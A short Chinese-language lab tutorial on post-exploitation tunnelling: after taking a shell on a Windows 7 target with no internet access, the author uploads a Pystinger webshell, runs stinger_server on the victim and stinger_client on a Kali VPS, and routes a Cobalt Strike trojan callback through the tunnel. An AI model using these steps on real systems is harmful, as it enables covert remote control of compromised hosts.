有时候实战拿shell后发现,目标机器ping不通外网,没有办法走网络层协议,所以需要搭建不出网隧道,但经过实验,建议最好是php环境会比较稳定。同样操作jsp环境下问题居多
相关介绍
Kali作vps 192.168.201.129 目标win7:192.168.201.132
目前拿下win7 shell
上传对应的Pystinger webshell文件并成功访问
然后将 stinger_server.exe上传到目标服务器 ,执行如下命令:
start stinger_server.exe 0.0.0.0
然后将stinger_client上传到vps,执行如下命令
./stinger_client -w http://192.168.201.132/proxy.jsp -l 0.0.0.0 -p 60000
发现失败,总是走不成功。没想明白为什么,因为环境用的是jspstudy,也支持php文件,在phproot目录下,所以我后面传了php文件上去后,发现成功了,实验后续如下。
上传php文件后并访问。 (猜测:如果php走通这个隧道,需要一下几个函数没被禁用才行)
执行php文件的操作
./stinger_client -w http://192.168.201.132/phproot/proxy.php -l 0.0.0.0 -p 60000
cs设置本地的监听地址和60020端口(注意是127.0.0.1)
然后cs选择test的listen发送exe或者powershell木马上线都可以,成功上线,vps(kali)可以看到有数据交互